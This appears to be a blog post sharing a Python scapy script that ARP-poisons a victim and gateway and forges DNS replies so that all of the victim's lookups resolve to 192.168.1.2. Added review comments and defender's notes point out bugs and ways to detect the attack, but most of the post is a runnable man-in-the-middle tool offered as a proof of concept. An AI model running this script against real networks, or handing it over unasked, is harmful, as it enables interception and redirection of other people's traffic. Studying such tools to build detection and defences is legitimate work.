Tuesday 22 April 2014

DNS Poison

This tool is a copy-paste of my ARP-cache poisoner with an additional function to poison DNS. Any request made to port 53 is sent to 192.168.1.2. Yes, it's hard-coded because it was a PoC to further develop my understanding of DNS and also to learn how to create child processes (forks) to split tasks up. This also automatically enables port forwarding, as I forgot to implement that in my original ARP poison tool. The ARP cache poisoning does its magic in a different process from the DNS sniffer.

#!/usr/bin/python

from scapy.all import *
import sys
import netifaces as nif
import netifaces
import signal
import os

def arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC):
"""Parent-process loop: enable IP forwarding, then keep sending unsolicited
"is-at" ARP replies so that victim and target each resolve the other's IP to localMAC.

Args:
    victimIP, targetIP: IPv4 addresses (strings) of the two hosts whose caches are rewritten.
    victimMAC, targetMAC: their real hardware addresses (looked up by the caller).
    localMAC: this host's MAC, advertised as the answer for both IPs.

Returns: never returns normally. The loop reads the module-level `running` flag;
in practice it ends when the SIGINT handler reaches sys.exit() inside arpRestore().

Defender's note: unsolicited is-at replies with a changing hwsrc for a fixed IP are
exactly what Dynamic ARP Inspection, static ARP entries and arpwatch-style
monitors catch; IP forwarding being toggled on a workstation is itself a host signal.
"""

# print "We in the PID of the parent: %d"%os.getpid()
# Fixed command string (no user input reaches the shell), so os.system is not an
# injection risk here. This is IP forwarding, not port forwarding, and like the raw
# sends below it presumably needs root.
os.system('sysctl -w net.ipv4.ip_forward=1')
print "IP Forwarding enabled"

#Send the packet to the victims mac. The source of the MAC is the GW address. In the ARP field the MAC of the GW IP address is our MAC.
#additionaly we set the op to an "is-at" packet
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = targetIP)

#Now we want the GW to think we are the victim.
#We send the packet the to GW/TARGET the source is from the Victim. We say the MAC of the Victim is our MAC
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = victimIP)

print "\nForwarding target: %s to  MAC %s"%(targetIP, localMAC)
print "Forwarding target: %s to MAC %s"%(victimIP, localMAC)

# `running` is the module-level flag; nothing inside this function changes it.
# inter = 1 appears to be the only pacing here - the loop has no sleep of its own.
while running:
sendp(victimARP, verbose = 0, inter = 1)
sendp(targetARP, verbose = 0, inter = 1)
# NOTE(review): the handler is (re)registered on every iteration, so the first two
# sends of the first pass run before any SIGINT handler is installed.
signal.signal(signal.SIGINT, ctrlc_handler)

def arpRestore(victimIP, targetIP, victimMAC, targetMAC):
"""Undo the poisoning: re-advertise the real IP->MAC pairs, disable forwarding, exit.

Sends four rounds (range(1, 5)) of is-at replies whose hwsrc is the genuine MAC of
each host, then turns net.ipv4.ip_forward back off and calls sys.exit().

Args:
    victimIP, targetIP: the two IPv4 addresses being restored.
    victimMAC, targetMAC: their real hardware addresses, used as hwsrc this time.

Raises: SystemExit, always, via sys.exit() at the end.
"""

# print "We are in process %d"%os.getpid()
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = targetMAC, psrc = targetIP)
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = victimMAC, psrc = victimIP)
print "\nRestoring arp caches..."

for i in range(1, 5):
# NOTE(review): verbose is not suppressed on this call (the next one has verbose = 0),
# so scapy prints its per-packet progress output for the victim side only.
sendp(victimARP, inter = 0.5)
sendp(targetARP, verbose = 0, inter = 0.5)

# Fixed command string again; reverses the sysctl set in arpPoison().
os.system('sysctl -w net.ipv4.ip_forward=0')
print "IP forwarding disabled"
print "Exiting..."
# Ends this (parent) process only. The forked sniffer child is neither signalled
# nor waited for anywhere in this file.
sys.exit()

def dnsPoison(pkt):
"""sniff() callback run in the child process for every 'udp and port 53' packet.

For a DNS query (qr == 0) whose IP source is the module-level victimIP, it forges a
reply with the same transaction id and question section and a single answer record
carrying rdata '192.168.1.2' with ttl 10, sends it, and prints the query's summary.
No check is made on the query name or qtype, so every query from the victim gets
the same answer.

Args:
    pkt: the sniffed scapy packet.

Defender's note: a DNSSEC-validating or encrypted (DoT/DoH) resolver path defeats or
bypasses this, and the forged reply still races the genuine resolver's answer - two
responses for one transaction id with differing rdata is a usable detection signal.
"""
# print "We are in PID of the child %d"%os.getpid()
# victimIP is read from module scope (set in the argv block at the bottom of the file).
if (pkt.haslayer(DNS)) and (pkt.getlayer(DNS).qr == 0) and (pkt[IP].src == victimIP):
ip = pkt.getlayer(IP)
dns = pkt.getlayer(DNS)
# The next two lines assign a layer's own field back to itself - no-ops.
ip.src = pkt[IP].src
ip.dst = pkt[IP].dst
# sport/dport are UDP fields, not IP fields; this appears to rely on scapy forwarding
# unknown field names to the payload layer so they land on the UDP header - verify.
ip.sport = pkt[UDP].sport
ip.dport = pkt[UDP].dport
queryname = dns.qd.qname
# DNSRR() is built without a type, so the answer record gets scapy's default type
# regardless of what qtype was asked.
resp = IP(dst=ip.src,src=ip.dst)/UDP(dport=ip.sport,sport=ip.dport)/DNS(id=dns.id,qr=1,qd=dns.qd,an=DNSRR(rrname=queryname,ttl=10,rdata='192.168.1.2'))
send(resp, verbose=0)
# Prints the observed query, not the forged response.
print pkt.summary()

def ctrlc_handler(signum, frm):
"""SIGINT handler installed by arpPoison(): restore the ARP caches and exit.

Args:
    signum, frm: the standard signal-handler arguments; unused.

Raises: SystemExit, because arpRestore() ends with sys.exit().
"""
# NOTE(review): without a `global running` statement this binds a new local, so the
# module-level flag read by arpPoison()'s while-loop is never changed. The process
# still stops only because arpRestore() calls sys.exit().
running = False
# victimIP, targetIP, victimMAC, targetMAC are the module-level values from argv.
arpRestore(victimIP, targetIP, victimMAC, targetMAC)

#########################################
###########Program Start!################
#########################################
# Argument handling: victim IP, target (gateway) IP, interface name.
try:
victimIP = sys.argv[1]
targetIP = sys.argv[2]
# url = sys.argv[3]
interface = sys.argv[3]

# Active lookup: getmacbyip sends an ARP request for each address. Presumably it
# returns None when nothing answers - there is no check for that here.
victimMAC = getmacbyip(victimIP)
targetMAC = getmacbyip(targetIP)

addrs = netifaces.ifaddresses(interface)
localMAC = addrs[nif.AF_LINK][0]["addr"]
# NOTE(review): bare except catches everything (including KeyboardInterrupt and
# SystemExit), prints usage and then falls through - the script still forks below
# with some of the names above possibly unbound, which surfaces later as NameError.
except:
print "\nUsage: arp_dns_poison <victim-ip> <target-ip> <interface>\n"
print "Example: arp_dns_poison 192.168.1.1 192.168.1.254 eth0\n"

# Flag read by arpPoison()'s loop; nothing in this file sets it to False at module scope.
running = True

# Two processes: the child sniffs DNS traffic on the interface and answers via
# dnsPoison(); the parent runs the ARP loop. The parent never waits for or
# terminates the child, and ctrlc_handler is only installed in the parent
# (inside arpPoison), so on SIGINT the child presumably gets the default behaviour.
childPID = os.fork()
if childPID == 0:
sniff(iface = interface, filter = "udp and port 53", prn = dnsPoison)
else:
arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC)
